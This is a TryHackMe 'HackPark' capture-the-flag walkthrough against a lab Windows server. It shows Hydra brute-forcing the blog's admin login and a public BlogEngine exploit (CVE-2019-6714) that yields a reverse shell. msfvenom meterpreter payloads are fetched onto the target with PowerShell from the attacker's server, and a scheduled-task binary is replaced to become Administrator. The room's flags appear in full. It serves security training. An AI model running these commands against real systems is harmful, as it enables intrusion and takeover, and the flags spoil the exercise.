TryHackMe-HackPark
HackPark
Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!
[Task 1] Deploy the vulnerable Windows machine
Instructions
Connect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
This room will cover brute-forcing an accounts credentials, handling public exploits, using the Metasploit framework and privilege escalation on Windows.
Deploy the machine and access its web server.
Whats the name of the clown displayed on the homepage?
Hint: Reverse Image Search
Let’s start with a Nmap scan:
$ nmap -sV -sC -A 10.10.79.198 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 07:26 CEST Nmap scan report for 10.10.79.198 Host is up (0.047s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 6 disallowed entries | /Account/*.* /search /search.aspx /error404.aspx |_/archive /archive.aspx |_http-server-header: Microsoft-IIS/8.5 |_http-title: hackpark | hackpark amusements 3389/tcp open ssl/ms-wbt-server? | rdp-ntlm-info: | Target_Name: HACKPARK | NetBIOS_Domain_Name: HACKPARK | NetBIOS_Computer_Name: HACKPARK | DNS_Domain_Name: hackpark | DNS_Computer_Name: hackpark | Product_Version: 6.3.9600 |_ System_Time: 2020-05-17T05:28:08+00:00 | ssl-cert: Subject: commonName=hackpark | Not valid before: 2020-05-16T05:23:21 |_Not valid after: 2020-11-15T05:23:21 |_ssl-date: 2020-05-17T05:28:09+00:00; 0s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 78.79 seconds
There is a web server running on port 80/tcp:
Connect to http://10.10.79.198 and download the image (http://10.10.79.198/image.axd?picture=/26572c3a-0e51-4a9f-9049-b64e730ca75d.jpg). Submit it to the Goole image search engine. It will find this: pennywise 1990 full body
Answer: pennywise
[Task 2] Using Hydra to brute-force a login
#2.0 - Instructions
Hydra is a parallelized, fast and flexible login cracker. If you don’t have Hydra installed or need a Linux machine to use it, you can deploy a powerful Kali Linux machine and control it in your browser!
Brute-forcing can be trying every combination of a password. Dictionary-attack’s are also a type of brute-forcing, where we iterating through a wordlist to obtain the password.
#2.1
Instructions
We need to find a login page to attack and identify what type of request the form is making to the webserver. Typically, web servers make two types of requests, a GET request which is used to request data from a webserver and a POST request which is used to send data to a server.
You can check what request a form is making by right clicking on the login form, inspecting the element and then reading the value in the method field. You can also identify this if you are intercepting the traffic through BurpSuite (other HTTP methods can be found here).
What request type is the Windows website login form using?
Answer
From the menu, go to the login page (http://10.10.79.198/Account/login.aspx?ReturnURL=/admin/).
$ curl -s http://10.10.79.198/Account/login.aspx?ReturnURL=/admin/ | grep "<form"
<form method="post" action="login.aspx?ReturnURL=%2fadmin%2f" id="Form1">
The form is using POST.
#2.2
Instructions
Now we know the request type and have a URL for the login form, we can get started brute-forcing an account.
Run the following command but fill in the blanks:
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
Guess a username, choose a password wordlist and gain credentials to a user account!
Hint: Username is admin… But what is the password?
Answer
Let’s first intercept the POST request using Burp Suite:
POST /Account/login.aspx?ReturnURL=%2fadmin%2f HTTP/1.1 Host: 10.10.79.198 User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 777 Origin: http://10.10.79.198 DNT: 1 Connection: close Referer: http://10.10.79.198/Account/login.aspx?ReturnURL=%2fadmin%2f Upgrade-Insecure-Requests: 1 __VIEWSTATE=nbWrkCqQ%2B1Hn%2Fgt8OwrXb%2B%2BFMX0bVJv9xbWiO3oASE6l0%2BDl73MXEP2ao2pwbsK6Jr4MzOI9cbeVU7o5WL%2BFKDPWl1RXjt5kLGmi%2F1d9biM%2Fi3jThbmDihH1A7JWIVyWFQ3lIXAOLpqdlBKHFv6dZd8XzdjcN%2FrgmGzhog7Sf0Ml3kvolr3pzU9VlhHtBqJZNJ%2FkQVxtOT%2Bc%2FxMceQklmwd%2FeiI1sb4%2B4Mv4ol44Uy4Mf9Vaw%2B6OUiBt1BZn8PQoOcFS6ul97keSrPf2jTIqUqeC1YQwwE0FU7Syl8jfviP6nsNb4aSX6ASTDZlajXjkTtFum%2Bpk3uz4%2FtNoraPjA%2FTn5DuX56Sbr4I9oGPQznIuhjc0&__EVENTVALIDATION=pKMn8W0WIp7BuOhOq9YO49%2BqkAVDl1TJjXzk%2BDzHnOyizFWE7BYkR%2Frn983R5edqA0yBYDn%2Fi7BIxrq%2FJlxoiMHPZ2UN1iFWs83YOrgnVHxJtr4R811S4kAhpj4kb6aqZ1r9F5iqUqIoj3gfQjf%2BtO7mRTdLARthnldxPEA73U3caeMM&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=password&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in
It will help us write the paylaod for hydra. Let’s crack the admin password:
$ hydra -f -l admin -P /data/src/wordlists/rockyou.txt 10.10.79.198 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=nbWrkCqQ%2B1Hn%2Fgt8OwrXb%2B%2BFMX0bVJv9xbWiO3oASE6l0%2BDl73MXEP2ao2pwbsK6Jr4MzOI9cbeVU7o5WL%2BFKDPWl1RXjt5kLGmi%2F1d9biM%2Fi3jThbmDihH1A7JWIVyWFQ3lIXAOLpqdlBKHFv6dZd8XzdjcN%2FrgmGzhog7Sf0Ml3kvolr3pzU9VlhHtBqJZNJ%2FkQVxtOT%2Bc%2FxMceQklmwd%2FeiI1sb4%2B4Mv4ol44Uy4Mf9Vaw%2B6OUiBt1BZn8PQoOcFS6ul97keSrPf2jTIqUqeC1YQwwE0FU7Syl8jfviP6nsNb4aSX6ASTDZlajXjkTtFum%2Bpk3uz4%2FtNoraPjA%2FTn5DuX56Sbr4I9oGPQznIuhjc0&__EVENTVALIDATION=pKMn8W0WIp7BuOhOq9YO49%2BqkAVDl1TJjXzk%2BDzHnOyizFWE7BYkR%2Frn983R5edqA0yBYDn%2Fi7BIxrq%2FJlxoiMHPZ2UN1iFWs83YOrgnVHxJtr4R811S4kAhpj4kb6aqZ1r9F5iqUqIoj3gfQjf%2BtO7mRTdLARthnldxPEA73U3caeMM&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-17 14:37:09 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task [DATA] attacking http-post-form://10.10.79.198:80/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=nbWrkCqQ%2B1Hn%2Fgt8OwrXb%2B%2BFMX0bVJv9xbWiO3oASE6l0%2BDl73MXEP2ao2pwbsK6Jr4MzOI9cbeVU7o5WL%2BFKDPWl1RXjt5kLGmi%2F1d9biM%2Fi3jThbmDihH1A7JWIVyWFQ3lIXAOLpqdlBKHFv6dZd8XzdjcN%2FrgmGzhog7Sf0Ml3kvolr3pzU9VlhHtBqJZNJ%2FkQVxtOT%2Bc%2FxMceQklmwd%2FeiI1sb4%2B4Mv4ol44Uy4Mf9Vaw%2B6OUiBt1BZn8PQoOcFS6ul97keSrPf2jTIqUqeC1YQwwE0FU7Syl8jfviP6nsNb4aSX6ASTDZlajXjkTtFum%2Bpk3uz4%2FtNoraPjA%2FTn5DuX56Sbr4I9oGPQznIuhjc0&__EVENTVALIDATION=pKMn8W0WIp7BuOhOq9YO49%2BqkAVDl1TJjXzk%2BDzHnOyizFWE7BYkR%2Frn983R5edqA0yBYDn%2Fi7BIxrq%2FJlxoiMHPZ2UN1iFWs83YOrgnVHxJtr4R811S4kAhpj4kb6aqZ1r9F5iqUqIoj3gfQjf%2BtO7mRTdLARthnldxPEA73U3caeMM&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed [STATUS] 944.00 tries/min, 944 tries in 00:01h, 14343454 to do in 253:15h, 16 active [80][http-post-form] host: 10.10.79.198 login: admin password: 1qaz2wsx [STATUS] attack finished for 10.10.79.198 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-17 14:38:44
Great! We now have the admin password: 1qaz2wsx.
#2.3
Instructions
Hydra really does have lots of functionality, and there are many “modules” available (an example of a module would be the http-post-form that we used above).
However, this tool is not only good for brute-forcing HTTP forms, but other protocols such as FTP, SSH, SMTP, SMB and more.
Below is a mini cheatsheet:
| Command | Description |
|---|---|
hydra -P <wordlist> -v <ip> <protocol>
|
Brute force against a protocol of your choice |
hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>
|
You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts) |
hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>
|
Attack a Windows Remote Desktop with a password list. |
hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
|
Craft a more specific request for Hydra to brute force. |
[Task 3] Compromise the machine
#3.0 - Instructions
In this task, you will identify and execute a public exploit (from exploit-db.com) to get initial access on this Windows machine!
Exploit-Database is a CVE (common vulnerability and exposures) archive of public exploits and corresponding vulnerable software, developed for the use of penetration testers and vulnerability researches. It is owned by Offensive Security (who are responsible for OSCP and Kali)
#3.1 Now you have logged into the website, are you able to identify the version of the BlogEngine?
Now that we are logged in as admin, click on the “About” link from the menu. Here is the information:
Your BlogEngine.NET Specification: * Version: 3.3.6.0 * Configuration: Single blog * Trust level: Unrestricted * Identity: IIS APPPOOL\Blog * Blog provider: XmlBlogProvider * Membership provider: XmlMembershipProvider * Role provider: XmlRoleProvider
Answer: 3.3.6.0
#3.2 Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?
Hint: Look on the exploit database page.
Googling the terms vulnerability blogengine 3.3.6.0 leads to https://www.exploit-db.com/exploits/46353 which is about CVE-2019-6714.
Let’s download the exploit. Read and follow the instructions:
Attack: First, we set the TcpClient address and port within the method below to our attack host, who has a reverse tcp listener waiting for a connection. Next, we upload this file through the file manager. In the current (3.3.6) version of BlogEngine, this is done by editing a post and clicking on the icon that looks like an open file in the toolbar. Note that this file must be uploaded as PostView.ascx. Once uploaded, the file will be in the /App_Data/files directory off of the document root. The admin page that allows upload is: http://10.10.10.10/admin/app/editor/editpost.cshtml Finally, the vulnerability is triggered by accessing the base URL for the blog with a theme override specified like so: http://10.10.10.10/?theme=../../App_Data/files
Let’s follow the instructions:
- Start by modifying the script so that we report the correct value for IP and port.
- Rename your script as
PostView.ascx - Go to posts (http://10.10.79.198/admin/#/content/posts) and click on “Welcome to HackPark” to edit this post
- From the edit bar on top of the post, click on the “File Manager” icon
- Click on the “+ UPLOAD” button and upload the
PostView.ascxscript - Close the file manager and click on “Save”
- Now, open your listener (
rlwrap nc -nlvp 1234) - Go to http://10.10.79.198/?theme=../../App_Data/files
Check your listener, you should now have a reverse shell.
#3.3 Using the public exploit, gain initial access to the server. Who is the webserver running as?
$ rlwrap nc -nlvp 1234 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.10.79.198. Ncat: Connection from 10.10.79.198:56475. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. whoami c:\windows\system32\inetsrv>whoami iis apppool\blog
[Task 4] Windows Privilege Escalation
#4.0 - Instructions
In this task we will learn about the basics of Windows Privilege Escalation.
First we will pivot from netcat to a meterpreter session and use this to enumerate the machine to identify potential vulnerabilities. We will then use this gathered information to exploit the system and become the Administrator.
#4.1
Instructions
Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.
If you don’t know how to do this, I suggest completing the Metasploit room first!
Tip: You can generate the reverse-shell payload using msfvenom, upload it using your current netcat session and execute it manually!
Answer
Let’s generate our executable with msfvenom (make sure you select a different port as the one used for the previous reverse shell):
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.**.** LPORT=2345 -f exe -o revshell.exe
Now, let’s download the payload from the server. To do that, we’ll first start a web server (from the same location where our exe is):
$ python3 -m http.server
Now, on the reverse shell, enter the following command:
powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/revshell.exe' -OutFile 'c:\windows\temp\revshell.exe'"
Now, open msfconsole:
$ msfconsole -q msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 10.9.**.** LHOST => 10.9.**.** msf5 exploit(multi/handler) > set LPORT 2345 LPORT => 2345 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.9.**.**:2345
Now, back to the reverse shell, let’s start the executable:
c:\windows\system32\inetsrv>cd \windows\temp
dir
c:\Windows\Temp>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of c:\Windows\Temp
05/17/2020 07:01 AM <DIR> .
05/17/2020 07:01 AM <DIR> ..
08/06/2019 02:13 PM 8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019 02:13 PM 181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019 02:13 PM 1,206 cleanup.txt
08/06/2019 02:13 PM 421 cmdout
08/06/2019 02:11 PM 0 DMI2EBC.tmp
08/03/2019 10:43 AM 0 DMI4D21.tmp
08/06/2019 02:12 PM 8,743 EC2ConfigService_20190806141221.log
08/06/2019 02:12 PM 292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
05/17/2020 07:01 AM 73,802 revshell.exe
08/06/2019 02:13 PM 21 stage1-complete.txt
08/06/2019 02:13 PM 28,495 stage1.txt
05/12/2019 09:03 PM 113,328 svcexec.exe
08/06/2019 02:13 PM 67 tmp.dat
13 File(s) 708,784 bytes
2 Dir(s) 39,143,284,736 bytes free
.\revshell.exe
c:\Windows\Temp>.\revshell.exe
In your msfconsole, you should now have a meterpreter:
[*] Sending stage (176195 bytes) to 10.10.79.198 [*] Meterpreter session 1 opened (10.9.**.**:2345 -> 10.10.79.198:54675) at 2020-05-17 16:05:38 +0200 meterpreter >
#4.2
Instructions
You can run metasploit commands such as sysinfo to get detailed information about the Windows system. Then feed this information into the windows-exploit-suggester script and quickly identify any obvious vulnerabilities.
What is the OS version of this windows machine?
Answer
meterpreter > sysinfo Computer : HACKPARK OS : Windows 2012 R2 (6.3 Build 9600). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows
Answer: Windows 2012 R2 (6.3 Build 9600)
#4.3 - Further enumerate the machine. What is the name of the abnormal service running?
Hint: Check in the `C:\Program Files (x86)` directory and go from there. Remember, you can use meterpreter to check all running processes on the machine.
meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 360 676 svchost.exe 376 4 smss.exe 528 520 csrss.exe 580 572 csrss.exe 592 520 wininit.exe 616 572 winlogon.exe 676 592 services.exe 684 592 lsass.exe 744 676 svchost.exe 788 676 svchost.exe 820 2552 cmd.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\cmd.exe 864 676 svchost.exe 884 616 dwm.exe 916 676 svchost.exe 944 676 svchost.exe 988 676 svchost.exe 1128 676 spoolsv.exe 1176 676 amazon-ssm-agent.exe 1244 676 svchost.exe 1268 676 LiteAgent.exe 1312 676 svchost.exe 1328 676 svchost.exe 1368 676 WService.exe 1476 676 msdtc.exe 1552 676 wlms.exe 1560 1368 WScheduler.exe 1576 676 Ec2Config.exe 1848 676 sppsvc.exe 2008 676 svchost.exe 2044 676 vds.exe 2316 744 WmiPrvSE.exe 2360 820 conhost.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\conhost.exe 2464 2144 WScheduler.exe 2536 916 taskhostex.exe 2552 1328 w3wp.exe x64 0 IIS APPPOOL\Blog C:\Windows\System32\inetsrv\w3wp.exe 2608 2600 explorer.exe 2940 820 revshell.exe x86 0 IIS APPPOOL\Blog c:\Windows\Temp\revshell.exe 3060 744 SppExtComObj.Exe 3068 2584 ServerManager.exe meterpreter >
Answer: WindowsScheduler.exe
#4.4 - What is the name of the binary you’re supposed to exploit?
Hint: have you checked for logs for the abnormal service?
meterpreter > cd "c:\program files (x86)" meterpreter > ls Listing: c:\program files (x86) =============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2013-08-22 15:36:16 +0200 Common Files 40777/rwxrwxrwx 4096 dir 2013-08-22 17:39:30 +0200 Internet Explorer 40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Microsoft.NET 40777/rwxrwxrwx 8192 dir 2019-08-04 13:36:42 +0200 SystemScheduler 40777/rwxrwxrwx 0 dir 2019-08-06 23:12:04 +0200 Uninstall Information 40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Windows Mail 40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 Windows NT 40777/rwxrwxrwx 0 dir 2013-08-22 17:39:30 +0200 WindowsPowerShell 100666/rw-rw-rw- 174 fil 2013-08-22 17:39:32 +0200 desktop.ini meterpreter > cd SystemScheduler meterpreter > ls Listing: c:\program files (x86)\SystemScheduler =============================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 4096 dir 2019-08-04 13:36:53 +0200 Events 100666/rw-rw-rw- 60 fil 2019-08-04 13:36:42 +0200 Forum.url 100666/rw-rw-rw- 9813 fil 2019-08-04 13:36:42 +0200 License.txt 100666/rw-rw-rw- 871 fil 2019-08-04 13:37:02 +0200 LogFile.txt 100666/rw-rw-rw- 2805 fil 2019-08-04 13:36:53 +0200 LogfileAdvanced.txt 100777/rwxrwxrwx 536992 fil 2019-08-04 13:36:42 +0200 Message.exe 100777/rwxrwxrwx 445344 fil 2019-08-04 13:36:42 +0200 PlaySound.exe 100777/rwxrwxrwx 27040 fil 2019-08-04 13:36:42 +0200 PlayWAV.exe 100666/rw-rw-rw- 149 fil 2019-08-04 13:36:53 +0200 Preferences.ini 100777/rwxrwxrwx 485792 fil 2019-08-04 13:36:42 +0200 Privilege.exe 100666/rw-rw-rw- 10100 fil 2019-08-04 13:36:42 +0200 ReadMe.txt 100777/rwxrwxrwx 112544 fil 2019-08-04 13:36:42 +0200 RunNow.exe 100777/rwxrwxrwx 235936 fil 2019-08-04 13:36:42 +0200 SSAdmin.exe 100777/rwxrwxrwx 731552 fil 2019-08-04 13:36:42 +0200 SSCmd.exe 100777/rwxrwxrwx 456608 fil 2019-08-04 13:36:42 +0200 SSMail.exe 100777/rwxrwxrwx 1633696 fil 2019-08-04 13:36:42 +0200 Scheduler.exe 100777/rwxrwxrwx 491936 fil 2019-08-04 13:36:42 +0200 SendKeysHelper.exe 100777/rwxrwxrwx 437664 fil 2019-08-04 13:36:42 +0200 ShowXY.exe 100777/rwxrwxrwx 439712 fil 2019-08-04 13:36:42 +0200 ShutdownGUI.exe 100666/rw-rw-rw- 785042 fil 2019-08-04 13:36:42 +0200 WSCHEDULER.CHM 100666/rw-rw-rw- 703081 fil 2019-08-04 13:36:42 +0200 WSCHEDULER.HLP 100777/rwxrwxrwx 136096 fil 2019-08-04 13:36:42 +0200 WSCtrl.exe 100777/rwxrwxrwx 68512 fil 2019-08-04 13:36:42 +0200 WSLogon.exe 100666/rw-rw-rw- 33184 fil 2019-08-04 13:36:42 +0200 WSProc.dll 100666/rw-rw-rw- 2026 fil 2019-08-04 13:36:42 +0200 WScheduler.cnt 100777/rwxrwxrwx 331168 fil 2019-08-04 13:36:42 +0200 WScheduler.exe 100777/rwxrwxrwx 98720 fil 2019-08-04 13:36:42 +0200 WService.exe 100666/rw-rw-rw- 54 fil 2019-08-04 13:36:42 +0200 Website.url 100777/rwxrwxrwx 76704 fil 2019-08-04 13:36:42 +0200 WhoAmI.exe 100666/rw-rw-rw- 1150 fil 2019-08-04 13:36:42 +0200 alarmclock.ico 100666/rw-rw-rw- 766 fil 2019-08-04 13:36:42 +0200 clock.ico 100666/rw-rw-rw- 80856 fil 2019-08-04 13:36:42 +0200 ding.wav 100666/rw-rw-rw- 1637972 fil 2019-08-04 13:36:42 +0200 libeay32.dll 100777/rwxrwxrwx 40352 fil 2019-08-04 13:36:42 +0200 sc32.exe 100666/rw-rw-rw- 766 fil 2019-08-04 13:36:42 +0200 schedule.ico 100666/rw-rw-rw- 355446 fil 2019-08-04 13:36:42 +0200 ssleay32.dll 100666/rw-rw-rw- 6999 fil 2019-08-04 13:36:42 +0200 unins000.dat 100777/rwxrwxrwx 722597 fil 2019-08-04 13:36:42 +0200 unins000.exe 100666/rw-rw-rw- 6574 fil 2019-08-04 13:36:42 +0200 whiteclock.ico meterpreter > cd events meterpreter > ls Listing: c:\program files (x86)\SystemScheduler\events ====================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 1927 fil 2019-08-05 00:05:19 +0200 20198415519.INI 100666/rw-rw-rw- 18175 fil 2019-08-05 00:06:01 +0200 20198415519.INI_LOG.txt 100666/rw-rw-rw- 186 fil 2020-05-17 15:38:43 +0200 Administrator.flg 100666/rw-rw-rw- 182 fil 2020-05-17 15:38:18 +0200 SYSTEM_svc.flg 100666/rw-rw-rw- 0 fil 2020-05-17 15:38:43 +0200 Scheduler.flg 100666/rw-rw-rw- 449 fil 2019-08-04 13:36:53 +0200 SessionInfo.flg 100666/rw-rw-rw- 0 fil 2020-05-17 15:38:18 +0200 service.flg meterpreter > cat 20198415519.INI_LOG.txt 08/04/19 15:06:01,Event Started Ok, (Administrator) 08/04/19 15:06:30,Process Ended. PID:2608,ExitCode:1,Message.exe (Administrator) 08/04/19 15:07:00,Event Started Ok, (Administrator) 08/04/19 15:07:34,Process Ended. PID:2680,ExitCode:4,Message.exe (Administrator) 08/04/19 15:08:00,Event Started Ok, (Administrator) 08/04/19 15:08:33,Process Ended. PID:2768,ExitCode:4,Message.exe (Administrator) 08/04/19 15:09:00,Event Started Ok, (Administrator) 08/04/19 15:09:34,Process Ended. PID:3024,ExitCode:4,Message.exe (Administrator) 08/04/19 15:10:00,Event Started Ok, (Administrator) 08/04/19 15:10:33,Process Ended. PID:1556,ExitCode:4,Message.exe (Administrator) 08/04/19 15:11:00,Event Started Ok, (Administrator) 08/04/19 15:11:33,Process Ended. PID:468,ExitCode:4,Message.exe (Administrator) 08/04/19 15:12:00,Event Started Ok, (Administrator) 08/04/19 15:12:33,Process Ended. PID:2244,ExitCode:4,Message.exe (Administrator) 08/04/19 15:13:00,Event Started Ok, (Administrator) 08/04/19 15:13:33,Process Ended. PID:1700,ExitCode:4,Message.exe (Administrator) 08/04/19 16:43:00,Event Started Ok,Can not display reminders while logged out. (SYSTEM_svc)* 08/04/19 16:44:01,Event Started Ok, (Administrator) 08/04/19 16:44:05,Process Ended. PID:2228,ExitCode:1,Message.exe (Administrator) 08/04/19 16:45:00,Event Started Ok, (Administrator) 08/04/19 16:45:20,Process Ended. PID:2640,ExitCode:1,Message.exe (Administrator) 08/04/19 16:46:00,Event Started Ok, (Administrator) 08/04/19 16:46:03,Process Ended. PID:2912,ExitCode:1,Message.exe (Administrator) 08/04/19 16:47:00,Event Started Ok, (Administrator) ...[SNIP]...
From the WindowsScheduler logs, we see that Message.exe is executed about every 30 seconds as administrator. We can take advantage of this to replace Message.exe with our reverse shell so that it is executed as adminstrator.
#4.5 - Using this abnormal service, escalate your privileges! What is the user flag (on Jeffs Desktop)?
Hint: Check exploit-db.com for a public writeup of this vulnerability. The missing binary isn’t the same as the public exploit.
Unfortunately, with our meterpreter, we have insufficient privileges to read the user flag and we can’t migrate to another process either:
meterpreter > cd users meterpreter > ls Listing: c:\users ================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2019-08-03 20:15:04 +0200 .NET v4.5 40777/rwxrwxrwx 0 dir 2019-08-03 20:15:04 +0200 .NET v4.5 Classic 40777/rwxrwxrwx 8192 dir 2019-08-03 19:43:51 +0200 Administrator 40777/rwxrwxrwx 0 dir 2013-08-22 16:48:41 +0200 All Users 40555/r-xr-xr-x 8192 dir 2013-08-22 15:36:16 +0200 Default 40777/rwxrwxrwx 0 dir 2013-08-22 16:48:41 +0200 Default User 40555/r-xr-xr-x 4096 dir 2013-08-22 15:36:16 +0200 Public 100666/rw-rw-rw- 174 fil 2013-08-22 17:39:32 +0200 desktop.ini 40777/rwxrwxrwx 0 dir 2019-08-04 20:54:52 +0200 jeff meterpreter > cd jeff [-] stdapi_fs_chdir: Operation failed: Access is denied.
Time to replace C:\Program Files (x86)\SystemScheduler\Message.exe with a reverse shell. Let’s first generate a new reverse shell (use a new port) that we will name Message.exe:
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.**.** LPORT=3456 -f exe -o Message.exe $ python3 -m http.server
In Metasploit, configure the TCP handler:
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 10.9.**.** LHOST => 10.9.**.** msf5 exploit(multi/handler) > set LPORT 3456 LPORT => 3456 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.9.**.**:3456
In the existing reverse shell, download your new reverse shell to replace the initial Message.exe with it:
powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"
After some seconds, we have a meterpreter as Administrator:
[*] Sending stage (176195 bytes) to 10.10.79.198 [*] Meterpreter session 1 opened (10.9.**.**:3456 -> 10.10.79.198:52832) at 2020-05-17 19:19:03 +0200 meterpreter > getuid Server username: HACKPARK\Administrator meterpreter > cd c:\users\jeff\desktop\ meterpreter > ls Listing: C:\users\jeff\desktop ============================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2019-08-04 20:54:53 +0200 desktop.ini 100666/rw-rw-rw- 32 fil 2019-08-04 20:55:12 +0200 user.txt meterpreter > cat user.txt 759bd8af507517bcfaede78a21a73e39
#4.6 - What is the root flag?
meterpreter > cd C:\users\administrator\desktop meterpreter > ls Listing: C:\users\administrator\desktop ======================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 1029 fil 2019-08-04 13:36:42 +0200 System Scheduler.lnk 100666/rw-rw-rw- 282 fil 2019-08-03 19:43:54 +0200 desktop.ini 100666/rw-rw-rw- 32 fil 2019-08-04 20:48:59 +0200 root.txt meterpreter > cat root.txt 7e13d97f05f7ceb9881a3eb3d78d3e72
[Task 5] Privilege Escalation Without Metasploit
#5.0 - Instructions
In this task we will escalate our privileges without the use of meterpreter/metasploit!
Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.
Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.
#5.1 - Now we can generate a more stable shell using msfvenom, instead of using a meterpreter, This time let’s set our payload to windows/shell_reverse_tcp
Let’s first download winPEAS.bat and make it available through our web server:
$ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat $ python -m http.server
#5.2 - After generating our payload we need to pull this onto the box using powershell. Tip: It’s common to find C:\Windows\Temp is world writable!
In our reverse shell, we can now download WinPEAS:
powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/WinPEAS.bat' -OutFile 'c:\windows\temp\winpeas.exe'"
#5.3
Instructions
Now you know how to pull files from your machine to the victims machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here)
WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!
Tip: You can execute these files by using .\filename.exe
Using winPeas, what was the Original Install time? (This is date and time)
Hint: powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
Answer
WinPEAS is now installed on the target, let’s execute it:
.\winpeas.bat
c:\Windows\Temp>.\winpeas.bat
*((,.,/((((((((((((((((((((/, */
,/*,..*(((((((((((((((((((((((((((((((((,
,*/((((((((((((((((((/, .*//((//**, .*((((((*
((((((((((((((((* *****,,,/########## .(* ,((((((
(((((((((((/* ******************/####### .(. ((((((
((((((..******************/@@@@@/***/######* /((((((
,,..**********************@@@@@@@@@@(***,#### ../(((((
, ,**********************#@@@@@#@@@@*********##((/ /((((
..(((##########*********/#@@@@@@@@@/*************,,..((((
.(((################(/******/@@@@@#****************.. /((
.((########################(/************************..*(
.((#############################(/********************.,(
.((##################################(/***************..(
.((######################################(************..(
.((######(,.***.,(###################(..***(/*********..(
.((######*(#####((##################((######/(********..(
.((##################(/**********(################(**...(
.(((####################/*******(###################.((((
